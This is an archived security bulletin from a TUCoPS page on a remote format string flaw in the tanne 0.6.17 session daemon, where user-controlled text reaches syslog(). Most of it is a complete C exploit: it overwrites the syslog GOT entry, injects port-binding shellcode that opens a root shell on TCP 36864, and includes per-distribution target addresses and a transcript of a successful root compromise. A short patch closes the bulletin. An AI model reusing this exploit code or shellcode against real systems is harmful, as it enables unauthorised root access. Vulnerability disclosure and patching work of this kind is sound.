Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: General :: sb5921.htm

Remote format string vulnerability in Tanne



8th Jan 2003 [SBWID-5921]
COMMAND

	Remote format string vulnerability in Tanne

SYSTEMS AFFECTED

	tanne 0.6.17

PROBLEM

	In dong-houn yoU  'Xpl017Elz'  [http://x82.i21c.net]  of  in  INetCop(c)
	Security [http://www.inetcop.org] advisory :
	
	tanne is a  small,  secure  session-management  solution  for  HTTP.  It
	replaces common sessions with a system consisting of PIN and TANs,  well
	known from online banking. It's main purpose is  to  enable  programmers
	of Web applications to have real  secure  sessions  without  cookies  or
	session-ids.
	
	More detailed information is http://tanne.fluxnetz.de/.
	
	Vulnerability can presume as following. There is  logger()  function  to
	29 lines of 'netzio.c' code.
	
	    __
	    59          else
	    60          {
	    61                  va_start( args, str );
	    62                  vsnprintf( txt, 511, str, args );
	    63                  va_end( args );
	    64                  openlog( "Tanne2", LOG_PID, LOG_DAEMON );
	    65                  syslog( LOG_INFO, txt ); // Here.
	    66                  closelog();
	    67          }
	    68          umask( NORMALE_UMASK );
	    69  #else
	    70          va_start( args, str );
	    71          vsnprintf( txt, 511, str, args );
	    72          va_end( args );
	    73          openlog( "Tanne2", LOG_PID, LOG_DAEMON );
	    74          syslog( LOG_INFO, txt ); // Here.
	    75          closelog();
	    76  #endif
	    77  }
	    --
	
	This is very dangerous security vulnerability. It's known already  well.
	;-)
	
	 Exploit
	 =======
	
	When compile and tested, bring following result.
	
	bash# netstat -an | grep 14002
	tcp        0      0 127.0.0.1:14002         0.0.0.0:*               LISTEN
	bash# nc 0 14002
	%x%x%x%x
	|F|
	bash# tail -1 /var/log/messages
	Jan  5 11:29:55 xpl017elz Tanne2[3540]: FATAL: ID (804bbc0118bffff980) nicht gefunden
	bash#
	
	If our examination ends, exhibit exploit  code  for  proof  of  concept.
	hehe !!
	
	 Update (08 January 2003)
	 ======
	
	dong-h0un yoU [xploit@hackermail.com] kindly adds :
	
	/*
	**
	** [*] Title: Remote format string vulnerability in Tanne.
	** [+] Exploit code: 0x82-Remote.tannehehe.xpl.c
	**
	** [+] Description --
	**
	** About:
	** tanne is a small, secure session-management solution for HTTP.
	** It replaces common sessions with a system consisting of PIN and TANs,
	** well known from online banking.
	** It's main purpose is to enable programmers of Web applications
	** to have real secure sessions without cookies or session-ids.
	**
	** More detailed information is http://tanne.fluxnetz.de/.
	**
	** Vulnerability can presume as following.
	** There is logger() function to 29 lines of 'netzio.c' code.
	**
	**    __
	**        ...
	**    65  syslog( LOG_INFO, txt ); // Here.
	**        ...
	**    74  syslog( LOG_INFO, txt ); // Here.
	**        ...
	**    --
	**
	** This is very dangerous security vulnerability.
	** It's known already well. ;-)
	**
	** [+] Vulnerable Packages --
	**
	** Vendor site: http://tanne.fluxnetz.de/
	**
	** tanne 0.6.17
	** -tanne-0.6.17.tar.bz2
	** +Linux
	** +Other
	**
	** [+] Exploit --
	**
	** Proof of Concept on RedHat Linux 8.0, tanne-0.6.17.tar.bz2:
	**
	** bash-2.05b$ ./0x82-Remote.tannehehe.xpl -t2
	**
	** Tanne Remote format string Xploit by Xpl017Elz
	**
	** [*] Target host localhost
	** [*] Target type: Red Hat Linux release 8.0 (Psyche) tanne-0.6.17.tar.bz2
	**
	** [1] Make it Format String.
	** [-] syslog GOT address: 0x804d1c8
	** [2] Pushing Shellcode.
	** [-] Shellcode address: 0xbffff974
	** [3] Setting Sock.
	** [4] Send Code.
	** [*] Waiting Rootshell :-)
	** [5] Trying localhost:36864 ...
	** [6] Connected to localhost:36864 !
	**
	** [*] Executed shell successfully !
	** [*] OK, It's Rootshell
	**
	** Linux thanks_maze_dorumuk 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002
	** i686 i686 i386 GNU/Linux
	** uid=0(root) gid=2(daemon) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
	** 6(disk),10(wheel)
	** bash: no job control in this shell
	** stty: standard input: Invalid argument
	** [root@maze_dorumuk tanne-0.6.17]# id
	** uid=0(root) gid=2(daemon) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
	** 6(disk),10(wheel)
	** [root@maze_dorumuk tanne-0.6.17]# exit
	** exit
	**
	** [*] Happy Exploit !
	**
	** bash-2.05b$
	**
	** GOT syslog address?
	**
	** bash-2.05b$ objdump --dynamic-reloc tanned | grep syslog
	** 0804d1c8 R_386_JUMP_SLOT   syslog
	** bash-2.05b$
	**
	** --
	** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
	** My World: http://x82.i21c.net & http://x82.inetcop.org
	**
	*/
	/*
	** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
	**
	** If compile by DEBUG mode, it exploit do can.
	** It's Proof of concept. (Therefore, don't support 'Brute-force' mode.)
	**
	** P.S Joke:
	**
	** I suffer because of English ability such as child sometimes. :-(
	** So, I'm studying English hard. hehehe!
	**
	** Where is really fine English teacher?!
	**
	** Greets:
	**
	** Developer Uli Funcke, mAzE_Dorumuk, BrainStorm (hello!),
	** ElectronicSouls (#!electronicsouls@efnet), INetCop(C) Security.
	**
	*/
	
	#define Xpl017Elz x82
	#define x0x_test1 (0x82*16)
	#define x0x_test2 (0x82*8)
	#define x0x_test3 (0x82*4)
	#define x0x_test4 (0x82)
	
	#include <stdio.h>
	#include <unistd.h>
	#include <netdb.h>
	#include <netinet/in.h>
	
	#define HOST "localhost"
	#define PORT 14002
	
	struct os {
	int num;
	char *ost;
	unsigned long gotrs;
	unsigned long shell;
	int flag;
	};
	
	struct os plat[] =
	{
	{
	0,"Red Hat Linux release 6.1 (Cartman) tanne-0.6.17.tar.bz2",
	0x0804d224,0xbffffa14,11
	},
	{
	1,"Red Hat Linux release 7.0 (Guinness) tanne-0.6.17.tar.bz2",
	0x0804d260,0xbffff974,5
	},
	{
	2,"Red Hat Linux release 8.0 (Psyche) tanne-0.6.17.tar.bz2",
	0x0804d1c8,0xbffff974,5
	}
	};
	
	// This is lovable shellcode, that's sweet in linux platform.
	char shellcode[]= /* portshell shellcode, 128 bytes (tcp/36864) */
	"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89"
	"\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89"
	"\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89"
	"\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89"
	"\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66"
	"\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80"
	"\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
	"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";
	unsigned char x82x82x82[x0x_test1];
	
	void banrl();
	int makefmt(u_long retloc,u_long shaddr,int flag);
	int setsock(char *hostname, int port);
	void usage(char *argument);
	void re_connt(int sock);
	void exect_sh(int sock);
	
	int main(argc,argv)
	int argc;
	char *argv[];
	{
	int ax82=0;
	int type=0;
	int port=PORT;
	int flag=plat[type].flag;
	int sockr,sockr2;
	
	extern char *optarg;
	char hostname[x0x_test4]=HOST;
	unsigned long retloc=plat[type].gotrs;
	unsigned long shaddr=plat[type].shell;
	
	(void)banrl();
	while((ax82=getopt(argc,argv,"R:r:S:s:F:f:H:h:T:t:Ii"))!=EOF)
	{
	switch(ax82)
	{
	case 'R':
	case 'r':
	retloc=strtoul(optarg,NULL,0);
	break;
	
	case 'S':
	case 's':
	shaddr=strtoul(optarg,NULL,0);
	break;
	
	case 'F':
	case 'f':
	flag=atoi(optarg);
	break;
	
	case 'H':
	case 'h':
	strncpy(hostname,optarg,x0x_test4);
	break;
	
	case 'T':
	case 't':
	type=atoi(optarg);
	if(type>2) /* 0,1,2 */
	{
	(void)usage(argv[0]);
	}
	else {
	retloc=plat[type].gotrs;
	shaddr=plat[type].shell;
	flag=plat[type].flag;
	}
	break;
	
	case 'I':
	case 'i':
	(void)usage(argv[0]);
	break;
	
	case '?':
	fprintf(stderr,
	" Try `%s -i' for more information.\n\n",argv[0]);
	exit(-1);
	break;
	}
	}
	
	fprintf(stdout," [*] Target host %s\n",hostname);
	fprintf(stdout," [*] Target type: %s\n\n",plat[type].ost);
	
	fprintf(stdout," [1] Make it Format String.\n");
	fprintf(stdout," [-] syslog GOT address: %p\n",retloc);
	(int)makefmt((u_long)retloc,(u_long)shaddr,(int)flag);
	
	fprintf(stdout," [3] Setting Sock.\n");
	sockr=setsock(hostname,port);
	(void)re_connt(sockr);
	
	fprintf(stdout," [4] Send Code.\n");
	send(sockr,x82x82x82,strlen(x82x82x82),0);
	fprintf(stdout," [*] Waiting Rootshell :-)\n");
	sleep(1);
	
	fprintf(stdout," [5] Trying %s:36864 ...\n",hostname);
	sockr2=setsock(hostname,36864);
	(void)re_connt(sockr2);
	fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname);
	(void)exect_sh(sockr2);
	
	}
	
	void banrl() {
	fprintf(stdout,"\n Tanne Remote format string Xploit by Xpl017Elz\n\n");
	}
	
	int makefmt(u_long retloc,u_long shaddr,int flag)
	{
	unsigned char x82x82[x0x_test2];
	unsigned char x0x[x0x_test3];
	
	int bx82,cx82,ex82,fx82,gx82,hx82;
	int add1,add2,add3,add4;
	bx82=cx82=ex82=fx82=gx82=hx82=0;
	add1=add2=add3=add4=0;
	
	memset((char *)x82x82x82,0,x0x_test1);
	memset((char *)x82x82,0,x0x_test2);
	memset((char *)x0x,0,x0x_test3);
	
	*(long *)&x0x[0]=0x82828282;
	*(long *)&x0x[4]=retloc+0;
	
	*(long *)&x0x[8]=0x82828282;
	*(long *)&x0x[12]=retloc+1;
	
	*(long *)&x0x[16]=0x82828282;
	*(long *)&x0x[20]=retloc+2;
	
	*(long *)&x0x[24]=0x82828282;
	*(long *)&x0x[28]=retloc+3;
	/* real */
	ex82=(shaddr>>24)&0xff;
	fx82=(shaddr>>16)&0xff;
	gx82=(shaddr>> 8)&0xff;
	hx82=(shaddr>> 0)&0xff;
	/* test */
	add1=(shaddr>>24)&0xff;
	add2=(shaddr>>16)&0xff;
	add3=(shaddr>> 8)&0xff;
	add4=(shaddr>> 0)&0xff;
	
	if((add4-40)<10)
	hx82+=0x100;
	if((add3-add4)<10)
	gx82+=0x100;
	if((add2-add3)<10)
	fx82+=0x100;
	
	for(bx82=0;bx82<0x140-strlen(shellcode);bx82++)
	x82x82[bx82]='N'; /* CodeRed?! Whoou ... */
	for(cx82=0;cx82<strlen(shellcode);cx82++)
	x82x82[bx82++]=shellcode[cx82];
	
	fprintf(stdout," [2] Pushing Shellcode.\n");
	fprintf(stdout," [-] Shellcode address: %p\n",shaddr);
	
	snprintf(x82x82x82,x0x_test1,
	"@%s" /* <- point */
	"%%%d$%ux%%%d$n%%%d$%ux%%%d$n" /* $-flag */
	"%%%d$%ux%%%d$n%%%d$%ux%%%d$n" /* format string */
	"%s\n", /* code */
	x0x,
	(flag+0),hx82-40,(flag+1),(flag+2),
	gx82-add4,(flag+3),(flag+4),fx82-add3,
	(flag+5),(flag+6),0x100+ex82-add2,
	(flag+7),x82x82);
	
	/* funny :-) */
	
	}
	
	void usage(char *argument)
	{
	fprintf(stdout," Usage: %s -options arguments\n\n",argument);
	fprintf(stdout," -r [retloc]      - GOT address.\n");
	fprintf(stdout," -s [shelladdr]   - shell address.\n");
	fprintf(stdout," -f [flagnum]     - flag number.\n");
	fprintf(stdout," -h [hostname]    - target host.\n");
	fprintf(stdout," -t [typenum]     - target number.\n");
	fprintf(stdout," -i               - help information.\n\n");
	fprintf(stdout," - Target Type Number List -\n\n");
	
	fprintf(stdout," {0} Red Hat Linux release 6.1 (Cartman)"
	" tanne-0.6.17.tar.bz2\n");
	fprintf(stdout," {1} Red Hat Linux release 7.0 (Guinness)"
	" tanne-0.6.17.tar.bz2\n");
	fprintf(stdout," {2} Red Hat Linux release 8.0 (Psyche)"
	" tanne-0.6.17.tar.bz2\n\n");
	
	fprintf(stdout," Example1: %s -r0x82828282 -s0x8282bab0 -f5",argument);
	fprintf(stdout,"\n Example2: %s -t 0 -h target.org\n\n",argument);
	
	exit(0);
	}
	
	void re_connt(int sock)
	{
	if(sock==-1)
	{
	fprintf(stdout," [-] Failed.\n\n");
	fprintf(stdout," Happy Exploit ! :-)\n\n");
	exit(-1);
	}
	}
	
	int setsock(char *hostname,int port) {
	
	int sock;
	struct hostent *he;
	struct sockaddr_in x82_addr;
	
	if((he=gethostbyname(hostname))==NULL)
	{
	herror(" [-] gethostbyname() error");
	return(-1);
	}
	if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
	{
	perror(" [-] socket() error");
	return(-1);
	}
	
	x82_addr.sin_family=AF_INET;
	x82_addr.sin_port=htons(port);
	x82_addr.sin_addr=*((struct in_addr *)he->h_addr);
	bzero(&(x82_addr.sin_zero),8);
	
	if(connect(sock,(struct sockaddr *)&x82_addr,
	sizeof(struct sockaddr))==EOF)
	{
	perror(" [-] connect() error");
	return(-1);
	}
	
	return(sock);
	
	}
	
	void exect_sh(int sock)
	{
	int pckt;
	char *cmd="uname -a;id;export TERM=vt100;exec bash -i\n";
	char rbuf[1024];
	fd_set rset;
	memset((char *)rbuf,0,1024);
	
	fprintf(stdout," [*] Executed shell successfully !\n");
	fprintf(stdout," [*] OK, It's Rootshell\n\n");
	send(sock,cmd,strlen(cmd),0);
	
	while(1)
	{
	fflush(stdout);
	FD_ZERO(&rset);
	FD_SET(sock,&rset);
	FD_SET(STDIN_FILENO,&rset);
	select(sock+1,&rset,NULL,NULL,NULL);
	
	if(FD_ISSET(sock,&rset))
	{
	pckt=read(sock,rbuf,1024);
	if(pckt<=0)
	{
	fprintf(stdout,"\n [*] Happy Exploit !\n\n");
	exit(0);
	}
	rbuf[pckt]=0;
	printf("%s",rbuf);
	}
	if(FD_ISSET(STDIN_FILENO,&rset))
	{
	pckt=read(STDIN_FILENO,rbuf,1024);
	if(pckt>0)
	{
	rbuf[pckt]=0;
	write(sock,rbuf,pckt);
	}
	}
	}
	return;
	}
	
	/* eox */
	

SOLUTION

	Patch :
	
	
	=== netzio.patch ===
	
	--- netzio.c	Wed Jul 25 22:17:29 2001
	+++ netzio.patch.c	Sun Jan  5 11:18:31 2003
	@@ -62,7 +62,7 @@
	 		vsnprintf( txt, 511, str, args );
	 		va_end( args );
	 		openlog( "Tanne2", LOG_PID, LOG_DAEMON );
	-		syslog( LOG_INFO, txt );
	+		syslog( LOG_INFO, "%s", txt );
	 		closelog();
	 	}
	 	umask( NORMALE_UMASK );
	@@ -71,7 +71,7 @@
	 	vsnprintf( txt, 511, str, args );
	 	va_end( args );
	 	openlog( "Tanne2", LOG_PID, LOG_DAEMON );
	-	syslog( LOG_INFO, txt );
	+	syslog( LOG_INFO, "%s", txt );
	 	closelog();
	 #endif
	 }
	
	
	=== eof ===
	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH